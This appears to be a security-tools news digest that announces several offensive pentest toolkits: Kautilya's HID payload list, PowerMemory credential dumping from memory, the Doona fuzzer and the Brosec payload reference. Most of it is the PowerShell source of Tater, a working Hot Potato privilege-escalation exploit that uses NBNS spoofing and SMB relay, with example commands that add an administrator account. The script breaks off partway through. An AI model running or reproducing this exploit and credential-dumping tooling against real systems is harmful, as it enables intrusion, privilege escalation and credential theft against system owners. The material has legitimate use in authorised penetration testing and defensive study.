Roadmap Changelog
Latest Change 11/2/2016 v0.5.6.1:
+ Added Invoke-PosRatHttps in the extras directory.
v0.5.6:
– Added “Reverse TCP Shell” under the Execute category.
– Added “Reverse UDP Shell” under the Execute category.
– Added “Reverse ICMP Shell” under the Execute category.
– Added “Reverse HTTPS Shell” under the Execute category.
– Added “Reverse HTTP Shell” under the Execute category.
– Fixed a bug in “Dump passwords in plain”.
– Added a standard disclaimer..

Kautilya is a toolkit which provides various payloads for a Human Interface Device which may help in breaking in a computer during penetration tests.

List of Payloads:
– Windows
Gather
+ Gather Information
+ Hashdump and Exfiltrate
+ Keylog and Exfiltrate
+ Sniffer
+ WLAN keys dump
+ Get Target Credentials
+ Dump LSA Secrets
+ Dump passwords in plain
+ Copy SAM
+ Dump Process Memory
+ Dump Windows Vault Credentials

Execute
+ Download and Execute
+ Connect to Hotspot and Execute code
+ Code Execution using Powershell
+ Code Execution using DNS TXT queries
+ Download and Execute PowerShell Script
+ Execute ShellCode
+ Reverse TCP Shell

Backdoor
+ Sethc and Utilman backdoor
+ Time based payload execution
+ HTTP backdoor
+ DNS TXT Backdoor
+ Wireless Rogue AP
+ Tracking Target Connectivity
+ Gupt Backdoor

Escalate
+ Remove Update
+ Forceful Browsing

Manage
+ Add an admin user
+ Change the default DNS server
+ Edit the hosts file
+ Add a user and Enable RDP
+ Add a user and Enable Telnet
+ Add a user and Enable Powershell Remoting

Drop Files
+ Drop a MS Word File
+ Drop a MS Excel File
+ Drop a CHM (Compiled HTML Help) file
+ Drop a Shortcut (.LNK) file
+ Drop a JAR file

Misc
+ Browse and Accept Java Signed Applet
+ Speak on Target

– Linux
+ Download and Execute
+ Reverse Shells using built in tools
+ Code Execution
+ DNS TXT Code Execution
+ Perl reverse shell (MSF)

– OSX
+ Download and Execute
+ DNS TXT Code Execution
+ Perl Reverse Shell (MSF)
+ Ruby Reverse Shell (MSF)

Payloads Compatibility
+ The Windows payloads and modules are written mostly in powershell (in combination with native commands) and are tested on Windows 7 and Windows 8.
+ The Linux payloads are mostly shell scripts (those installed by default) in combination with commands. These are tested on Ubuntu 11.
+ The OS X payloads are shell scripts (those installed by default) with usage of native commands. Tested on OS X Lion running on a VMWare

Usage:

git clone https://github.com/samratashok/Kautilya && cd Kautilya
bundle install
ruby kautilya.rb

Updates:
git pull origin master

Source: https://github.com/samratashok

Latest Change v1.1 11/1/2016;
+ PowerMemory launcher v1.1
+ Sets the $start variable in Windows 7 32 bit so that the key can be properly retrieved from memory.
+ Get-FirewallCredential.ps1 ; PowerShell version of @funoverip McAfee decryption of SiteList.xml to retrieve Plaintext passwords.
+ Get-MacAfee.ps1

GWMD: Dump Like Microsoft

Inside Folder :
– EYLR:Elevate-YourRightsMan.ps1; For Bypass-UAC.
– GWMD: Wanna-DumpLikeMicrosoft.ps1; WMI Remote Process.
– RGPPP: Get-LocalAdminGPPAccess.ps1: get Decrypt Password.
– RWMC: Powershell – Reveal Windows Memory Credentials
– RECON: Audit a Windows Active Directory domain

Powershell – Reveal Windows Memory Credentials
The purpose of this script is to make a proof of concept of how retrieve Windows credentials with Powershell and CDB Command-Line Options (Windows Debuggers)

It allows to retrieve credentials from windows 2003 to 2012 and Windows 10 (it was tested on 2003, 2008r2, 2012, 2012r2 and Windows 7 – 32 and 64 bits, Windows 8 and Windows 10 Home edition).
It works even if you are on another architecture than the system targeted.
Features:
+ it’s fully PowerShell
+ it can work locally, remotely or from a dump file collected on a machine
+ it does not use the operating system .dll to locate credentials address in memory but a simple Microsoft debugger
+ it does not use the operating system .dll to decypher passwords collected –> it is does in the PowerShell (AES, TripleDES, DES-X)
+ it breaks undocumented Microsoft DES-X
+ it works even if you are on a different architecture than the target
+ it leaves no trace in memoryless

How to use it for Windows 2012R2 or Windows 10?
1) Retrieve remotely:
* Launch the script
* Local computer, Remote computer or from a dump file ? (local, remote, dump): remote [enter]
* serverName [enter]

2) From a dump: if you have to dump the lsass process of a target machine, you can execute the script with option ( ! name you lsass dump “lsass.dmp” and don’t enter the name for the option you enter, only the directory !) :
* Launch the script
* Local computer, Remote computer or from a dump file ? (local, remote, dump): dump [enter]
* d:\directory_of_the_dump [enter]

3) Locally :
* Launch the script
* Local computer, Remote computer or from a dump file ? (local, remote, dump): local [enter]

How To Install:

Download zip file, right click extract all file into your Folder
Open PowerShell ISE
Enter this command : Set-ExecutionPolicy Unrestricted -force

Download: PowerMemory.zip(14.2 MB)  | Clone Url
Source : https://github.com/giMini | Our Post Before

Latest change 11/2/2016:
+ rtsp.pm: Attempt at a betterr rtsp health check.
This package is an extension to bed, to check for http server vulnerabilities
+ Updating dummy.pm to a fix some typo’s, references, etc

Doona is a fork of the Bruteforce Exploit Detector Tool (BED). BED is a program which is designed to check daemons for potential buffer overflows, format string bugs etc.

doona.pl

with module:
– dict
– finger
– ftp
– http
– imap
– irc
– lpd
– pjl
– pop
– proxy
– rtsp
– smtp
– socks4
– socks5
– tftp
– whois

usage:

git clone https://github.com/wireghoul/doona && cd doona
perl doona.pl -h

updates:
cd doona
git pull origin master

Source : https://github.com/wireghoul

Changelog v0.2a (Feb 15, 2016):
+ Features
— bros clean; New feature added to allow quick deletion of the local Brosec database.
+ Minor performance improvements throughout Brosec

Brosec – An interactive reference tool to help security professionals utilize useful payloads and commands.

Brosec – Console

Overview :
– Brosec is a RTFM-like utility to help Security Bros remember complex but useful payloads and commands
– Brosec utilizes saved variables (set by you) to create custom payloads on the fly. This config info is stored in a local db for your convenience
– Brosec outputs payloads and copies it to your clipboard in order to make your pentesting even more magical
– Your current config can be accessed by the config command at any time, or by entering the variable name
– Config values can be changed at any time by entering set <variable> <value>
– You can navigate to frequently used payloads by entering the menu sequence from the command line: bros <sequence>
Ex: bros 412 – This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload

Installation
Mac
+ brew install node netcat – Install Nodejs and netcat (or nc, ncat, etc)
+ git clone https://github.com/gabemarshall/Brosec.git – Clone Brosec repo
+ cd Brosec && npm install – cd into the directory and install npm depdendencies

Linux
+ <package manager> install node build-essential g++ xsel netcat Install Nodejs and other dependencies
+ git clone https://github.com/gabemarshall/Brosec.git – Clone Brosec repo
+ cd Brosec && npm install – cd into the directory and install npm depdendencies

Windows (Unsupported)
+ Install nodejs
+ Install ncat
+ git clone https://github.com/gabemarshall/Brosec.git – Clone Brosec repo
Payloads that utilize netcat will not work due to the kexec library not being supported in Windows

Configuration:
Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable.
Payload Variables;
+ LHOST : Local IP or name
+ LPORT : Local IP or name
+ RHOST : Remote IP or name
+ RPORT : Remote IP or name
+ USER : Username (only used in a few payloads)
+ PROMPT : User Prompt (This isn’t a stored value. Instead, payloads with this variable will prompt for input.)

Download : Master.zip  | Clone Url | Our Post before
Source : https://github.com/gabemarshall

Latest change 15/2/2016:
Added the following parameters:
+ NBNSLimit – Default = Enabled: Enable/Disable NBNS bruteforce spoofer limiting to stop NBNS spoofing while hostname is resolving correctly.
WPADPort – Default = 80: Specify a proxy server port to be included in a the wpad.dat file.
+ SpooferIP – Specify an IP address for NBNS spoofing.
WPADPort and SpooferIP, along with HTTPPort, can be used to get around an in-use port 80 on the privesc target. I believe potato.exe also now
has similiar options.

Tater.ps1

Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit. Tater is mainly pieced together from existing Inveigh code.

Notes
Use caution, this is still very much in a proof of concept stage. It’s only been tested on Windows 7. It’s also missing some of the advanced features found in Potato.
The most likely thing to go wrong is that the HTTP listener will not release the port 80 binding on exit. If this happens, closing out your PowerShell process will remove the binding.

Example usage Tater.ps1

Example usage :

Invoke-Tater -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
Invoke-Tater -Command "net user tater Winter2016 /add && net localgroup administrators tater /add" –RunTime 10

Tater.ps1 Script:

Function Invoke-Tater
{
<#
.SYNOPSIS
Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit from @breenmachine and @foxglovesec.
.DESCRIPTION
Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit from @breenmachine and @foxglovesec. It has functionality similiar to Potato.exe available at https://github.com/foxglovesec/Potato.
.PARAMETER IP
Specify a specific local IP address.
.PARAMETER SpooferIP
Specify an IP address for NBNS spoofing. This is needed when using two hosts to get around an in-use port 80 on the privesc target. 
.PARAMETER Command
Command to execute as SYSTEM on the localhost.
.PARAMETER NBNS
Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofing. 
.PARAMETER NBNSLimit
Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofer limiting to stop NBNS spoofing while hostname is resolving correctly.
.PARAMETER ExhaustUDP
Default = Disabled: Enable/Disable UDP port exhaustion to force all DNS lookups to fail in order to fallback to NBNS resolution.
.PARAMETER HTTPPort
Default = 80: Specify a TCP port for HTTP listener and redirect response.
.PARAMETER Hostname
Default = WPAD: Hostname to spoof. "WPAD.DOMAIN.TLD" is required by Windows Server 2008.
.PARAMETER WPADDirectHosts
Comma separated list of hosts to list as direct in the wpad.dat file. Note that 'localhost' is always listed as direct.
.PARAMETER WPADPort
Default = 80: Specify a proxy server port to be included in a the wpad.dat file.
.PARAMETER Trigger
Default = 1: Trigger type to use in order to trigger HTTP to SMB relay. 0 = None, 1 = Windows Defender Signature Update, 2 = Windows 10 Webclient/Scheduled Task
.PARAMETER Taskname
Default = omg: Scheduled task name to use with trigger 2.
.PARAMETER RunTime
(Integer) Set the run time duration in minutes.
.PARAMETER ConsoleOutput
Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
.PARAMETER FileOutput
Default = Disabled: (Y/N) Enable/Disable real time file output.
.PARAMETER StatusOutput
Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
.PARAMETER ShowHelp
Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
.PARAMETER Tool
Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire  
.EXAMPLE
Invoke-Tater -Command "net user Dave Winter2016 /add && net localgroup administrators Dave /add"
.LINK
https://github.com/Kevin-Robertson/Tater
#>

# Default parameter values can be modified in this section 
param
( 
    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNS="Y",
    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNSLimit="Y",
    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ExhaustUDP="N",
    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ConsoleOutput="Y",
    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$StatusOutput="Y",
    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y",
    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0",
    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$IP="",
    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SpooferIP="127.0.0.1",
    [parameter(Mandatory=$false)][int]$HTTPPort="80",
    [parameter(Mandatory=$false)][int]$RunTime="",
    [parameter(Mandatory=$false)][ValidateSet(0,1,2)][int]$Trigger="1",
    [parameter(Mandatory=$true)][string]$Command = "",
    [parameter(Mandatory=$false)][string]$Hostname = "WPAD",  
    [parameter(Mandatory=$false)][string]$Taskname = "Tater",
    [parameter(Mandatory=$false)][string]$WPADPort="80",
    [parameter(Mandatory=$false)][array]$WPADDirectHosts,
    [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)

if ($invalid_parameter)
{
    throw "$($invalid_parameter) is not a valid parameter."
}

if(!$IP)
{ 
    $IP = (Test-Connection 127.0.0.1 -count 1 | select -ExpandProperty Ipv4Address)
}

if(!$Command)
{
    Throw "You must specify an -Command if enabling -SMBRelay"
}

if(!$tater)
{
    $global:tater = [hashtable]::Synchronized(@{})
}

if($tater.running)
{
    Throw "Invoke-Tater is already running, use Stop-Tater"
}

$tater.console_queue = New-Object System.Collections.ArrayList
$tater.status_queue = New-Object System.Collections.ArrayList
$tater.console_output = $true
$tater.console_input = $true
$tater.running = $true
$tater.exhaust_UDP_running = $false
$tater.hostname_spoof = $false
$tater.SMB_relay_active_step = 0
$tater.SMB_relay = $true
$tater.trigger = $Trigger

if($StatusOutput -eq 'y')
{
    $tater.status_output = $true
}
else
{
    $tater.status_output = $false
}

if($Tool -eq 1) # Metasploit Interactive Powershell
{
    $tater.tool = 1
    $tater.newline = ""
    $ConsoleOutput = "N"
}
elseif($Tool -eq 2) # PowerShell Empire
{
    $tater.tool = 2
    $tater.console_input = $false
    $tater.newline = "`n"
    $ConsoleOutput = "Y"
    $ShowHelp = "N"
}
else
{
    $tater.tool = 0
    $tater.newline = ""
}

if($Trigger -eq 2)
{
    $NBNS = 'N'
}

# Write startup messages
$tater.status_queue.add("$(Get-Date -format 's') - Tater (Hot Potato Privilege Escalation) started")|Out-Null
$tater.status_queue.add("Local IP Address = $IP") |Out-Null

if($HTTPPort -ne 80)
{
    $tater.status_queue.add("HTTP Port = $HTTPPort")|Out-Null
}

if($NBNS -eq 'y')
{
    $tater.status_queue.add("Spoofing Hostname = $Hostname")|Out-Null

    if($NBNSLimit -eq 'n')
    {
        $tater.status_queue.add("NBNS Bruteforce Spoofer Limiting Disabled")|Out-Null
    }
}
else
{
    $tater.status_queue.add("NBNS Bruteforce Spoofing Disabled")|Out-Null
}

if($SpooferIP -ne '127.0.0.1')
{
    $tater.status_queue.add("NBNS Spoofer IP Address = $SpooferIP")|Out-Null
}

if($WPADDirectHosts.Count -gt 0)
{
    $tater.status_queue.add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",")|Out-Null
}

if($WPADPort -ne 80)
{
    $tater.status_queue.add("WPAD Port = $WPADPort")|Out-Null
}

if($ExhaustUDP -eq 'y')
{
    $tater.status_queue.add("UDP Port Exhaustion Enabled")|Out-Null
}

if($Trigger -eq 0)
{
    $tater.status_queue.add("Relay Trigger Disabled")|Out-Null
}
elseif($Trigger -eq 1)
{
    $tater.status_queue.add("Windows Defender Trigger Enabled")|Out-Null
}
elseif($Trigger -eq 2)
{
    $tater.status_queue.add("Scheduled Task Trigger Enabled")|Out-Null
    $tater.status_queue.add("Scheduled Task = $Taskname")|Out-Null
    $tater.taskname = $Taskname
}

if($ConsoleOutput -eq 'y')
{
    $tater.status_queue.add("Real Time Console Output Enabled")|Out-Null
    $tater.console_output = $true
}
else
{
    if($tater.tool -eq 1)
    {
        $tater.status_queue.add("Real Time Console Output Disabled Due To External Tool Selection")|Out-Null
    }
    else
    {
        $tater.status_queue.add("Real Time Console Output Disabled")|Out-Null
    }
}

if($RunTime -eq '1')
{
    $tater.status_queue.add("Run Time = $RunTime Minute")|Out-Null
}
elseif($RunTime -gt 1)
{
    $tater.status_queue.add("Run Time = $RunTime Minutes")|Out-Null
}

if($ShowHelp -eq 'y')
{
    $tater.status_queue.add("Run Stop-Tater to stop Tater early")|Out-Null
        
    if($tater.console_output)
    {
        $tater.status_queue.add("Use Get-Command -Noun Tater* to show available functions")|Out-Null
        $tater.status_queue.add("Press any key to stop real time console output")|Out-Null
        $tater.status_queue.add("")|Out-Null
    }
}

if($tater.status_output)
{
    while($tater.status_queue.Count -gt 0)
    {
        write-output($tater.status_queue[0] + $tater.newline)
        $tater.status_queue.RemoveRange(0,1)
    }
}

$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() |select -expand id
$process_ID = [BitConverter]::ToString([BitConverter]::GetBytes($process_ID))
$process_ID = $process_ID -replace "-00-00",""
[Byte[]]$tater.process_ID_bytes = $process_ID.Split("-") | FOREACH{[CHAR][CONVERT]::toint16($_,16)}

# Begin ScriptBlocks

# Shared Basic Functions ScriptBlock
$shared_basic_functions_scriptblock =
{
    Function DataToUInt16($field)
    {
	   [Array]::Reverse($field)
	   return [BitConverter]::ToUInt16($field,0)
    }

    Function DataToUInt32($field)
    {
	   [Array]::Reverse($field)
	   return [BitConverter]::ToUInt32($field,0)
    }

    Function DataLength
    {
        param ([int]$length_start,[byte[]]$string_extract_data)

        $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0)
        return $string_length
    }

    Function DataToString
    {
        param ([int]$string_length,[int]$string2_length,[int]$string3_length,[int]$string_start,[byte[]]$string_extract_data)

        $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length-1)])
        $string_data = $string_data -replace "-00",""
        $string_data = $string_data.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
        $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
        return $string_extract
    }

    Function DnsFlushResolverCache
    {
        $DNS_member_definition = @'
            [DllImport("dnsapi.dll", EntryPoint="DnsFlushResolverCache")]
            private static extern UInt32 DnsFlushResolverCache();
            public static void FlushResolverCache()
            {
                UInt32 result = DnsFlushResolverCache();
            }
'@

        Add-Type -MemberDefinition $DNS_member_definition -Namespace DNSAPI -Name Flush -UsingNamespace System.Collections,System.ComponentModel
        [DNSAPI.Flush]::FlushResolverCache()
    }

    Function HTTPListenerStop
    {
        $tater.console_queue.add("$(Get-Date -format 's') - Attempting to stop HTTP listener")
        $tater.HTTP_client.Close()
        start-sleep -s 1
        $tater.HTTP_listener.server.blocking = $false
        Start-Sleep -s 1
        $tater.HTTP_listener.server.Close()
        Start-Sleep -s 1
        $tater.HTTP_listener.Stop()
        $tater.running = $false
    }
}

# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
$SMB_NTLM_functions_scriptblock =
{
    Function SMBNTLMChallenge
    {
        param ([byte[]]$payload_bytes)

        $payload = [System.BitConverter]::ToString($payload_bytes)
        $payload = $payload -replace "-",""
        $NTLM_index = $payload.IndexOf("4E544C4D53535000")

        if($payload.SubString(($NTLM_index + 16),8) -eq "02000000")
        {
            $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
        }

        return $NTLM_challenge
    }
}

# SMB Relay Challenge ScriptBlock - gathers NTLM server challenge from relay target
$SMB_relay_challenge_scriptblock =
{
    Function SMBRelayChallenge
    {
        param ($SMB_relay_socket,$HTTP_request_bytes)

        if ($SMB_relay_socket)
        {
            $SMB_relay_challenge_stream = $SMB_relay_socket.GetStream()
        }
        
        $SMB_relay_challenge_bytes = New-Object System.Byte[] 1024

        $i = 0
        
        :SMB_relay_challenge_loop while ($i -lt 2)
        {
            switch ($i)
            {
                0 {
                    [Byte[]] $SMB_relay_challenge_send = (0x00,0x00,0x00,0x2f,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,0x18,0x01,0x48)`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
                        + $tater.process_ID_bytes`
                        + (0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x02,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00)
                }
                
                1 { 
                    $SMB_length_1 = '0x{0:X2}' -f ($HTTP_request_bytes.length + 32)
                    $SMB_length_2 = '0x{0:X2}' -f ($HTTP_request_bytes.length + 22)
                    $SMB_length_3 = '0x{0:X2}' -f ($HTTP_request_bytes.length + 2)
                    $SMB_NTLMSSP_length = '0x{0:X2}' -f ($HTTP_request_bytes.length)
                    $SMB_blob_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length))
                    $SMB_blob_length = $SMB_blob_length -replace "-00-00",""
                    $SMB_blob_length = $SMB_blob_length.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
                    $SMB_byte_count = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 28))
                    $SMB_byte_count = $SMB_byte_count -replace "-00-00",""
                    $SMB_byte_count = $SMB_byte_count.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
                    $SMB_netbios_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 87))
                    $SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
                    $SMB_netbios_length = $SMB_netbios_length.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
                    [array]::Reverse($SMB_netbios_length)
                    
                    [Byte[]] $SMB_relay_challenge_send = (0x00,0x00)`
                        + $SMB_netbios_length`
                        + (0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
                        + $tater.process_ID_bytes`
                        + (0x00,0x00,0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00,0x00,0x00)`
                        + $SMB_blob_length`
                        + (0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80)`
                        + $SMB_byte_count`
                        + $HTTP_request_bytes`
                        + (0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73,0x00,0x00,0x00)`
                        + (0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00,0x00,0x00)
                }
            }

            $SMB_relay_challenge_stream.Write($SMB_relay_challenge_send, 0, $SMB_relay_challenge_send.length)
            $SMB_relay_challenge_stream.Flush()
    
            $SMB_relay_challenge_stream.Read($SMB_relay_challenge_bytes, 0, $SMB_relay_challenge_bytes.length)

            $i++
        }
        
        return $SMB_relay_challenge_bytes
    }
}

# SMB Relay Response ScriptBlock - sends NTLM reponse to relay target
$SMB_relay_response_scriptblock =
{
    Function SMBRelayResponse
    {
        param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_user_ID)
    
        $SMB_relay_response_bytes = New-Object System.Byte[] 1024

        if ($SMB_relay_socket)
        {
            $SMB_relay_response_stream = $SMB_relay_socket.GetStream()
        }
        
        $SMB_blob_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length))
        $SMB_blob_length = $SMB_blob_length -replace "-00-00",""
        $SMB_blob_length = $SMB_blob_length.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
        $SMB_byte_count = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 28))
        $SMB_byte_count = $SMB_byte_count -replace "-00-00",""
        $SMB_byte_count = $SMB_byte_count.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
        $SMB_netbios_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 88))
        $SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
        $SMB_netbios_length = $SMB_netbios_length.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
        [array]::Reverse($SMB_netbios_length)
        $j = 0

        :SMB_relay_response_loop while ($j -lt 1)
        {
            [Byte[]] $SMB_relay_response_send = (0x00,0x00)`
                + $SMB_netbios_length`
                + (0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
                + $tater.process_ID_bytes`
                + $SMB_user_ID`
                + (0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00,0x00,0x00)`
                + $SMB_blob_length`
                + (0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80)`
                + $SMB_byte_count`
                + $HTTP_request_bytes`
                + (0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73,0x00,0x00,0x00)`
                + (0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00,0x00,0x00)

            $SMB_relay_response_stream.write($SMB_relay_response_send, 0, $SMB_relay_response_send.length)
        	$SMB_relay_response_stream.Flush()

            $SMB_relay_response_stream.Read($SMB_relay_response_bytes, 0, $SMB_relay_response_bytes.length)
            
            $tater.SMB_relay_active_step = 2
            
            $j++
        
        }
        return $SMB_relay_response_bytes
    }
}

# SMB Relay Execute ScriptBlock - executes command within authenticated SMB session
$SMB_relay_execute_scriptblock =
{
    Function SMBRelayExecute
    {
        param ($SMB_relay_socket,$SMB_user_ID)
    
        if ($SMB_relay_socket)
        {
            $SMB_relay_execute_stream = $SMB_relay_socket.GetStream()
        }

        $SMB_relay_failed = $false
        $SMB_relay_execute_bytes = New-Object System.Byte[] 1024
        $SMB_service_random = [String]::Join("00-", (1..20 | % {"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
        $SMB_service = $SMB_service_random -replace "-00",""
        $SMB_service = $SMB_service.Substring(0,$SMB_service.Length-1)
        $SMB_service = $SMB_service.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
        $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
        $SMB_service_random += '00-00-00'
        [Byte[]]$SMB_service_bytes = $SMB_service_random.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
        $SMB_referent_ID_bytes = [String](1..4 | % {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
        $SMB_referent_ID_bytes = $SMB_referent_ID_bytes.Split(" ") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
        $Command = "%COMSPEC% /C `"" + $Command + "`""
        [System.Text.Encoding]::ASCII.GetBytes($Command) | % { $SMB_relay_command += "{0:X2}-00-" -f $_ }

        if([bool]($Command.length%2))
        {
            $SMB_relay_command += '00-00'
        }
        else
        {
            $SMB_relay_command += '00-00-00-00'
        }    
        
        [Byte[]]$SMB_relay_command_bytes = $SMB_relay_command.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
        $SMB_service_data_length_bytes = [BitConverter]::GetBytes($SMB_relay_command_bytes.length + $SMB_service_bytes.length + 237)
        $SMB_service_data_length_bytes = $SMB_service_data_length_bytes[2..0]
        $SMB_service_byte_count_bytes = [BitConverter]::GetBytes($SMB_relay_command_bytes.length + $SMB_service_bytes.length + 237 - 63)
        $SMB_service_byte_count_bytes = $SMB_service_byte_count_bytes[0..1]   
        $SMB_relay_command_length_bytes = [BitConverter]::GetBytes($SMB_relay_command_bytes.length / 2)

        $k = 0

        :SMB_relay_execute_loop while ($k -lt 12)
        {
            switch ($k)
            {
            
                0 {
                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00,0x18,0x01,0x48)`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
                        + $tater.process_ID_bytes`
                        + $SMB_user_ID`
                        + (0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00,0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31)`
                        + (0x30,0x2e,0x32,0x2e,0x31,0x30,0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00)
                }
                  
                1 {
                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00,0x18,0x02,0x28)`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
                        + $tater.process_ID_bytes`
                        + $SMB_user_ID`
                        + (0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)`
                        + (0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01,0x00,0x00,0x00)`
                        + (0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08,0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00)
                }
                
                2 {
                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
                        + $tater.process_ID_bytes`
                        + $SMB_user_ID`
                        + (0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00)`
                        + (0x00,0x00,0x48,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48)`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00)`
                        + (0x01,0x00,0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03,0x02,0x00,0x00)`
                        + (0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00)
                        
                        $SMB_multiplex_id = (0x05)
                }
               
                3 { 
                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                }
                
                4 {
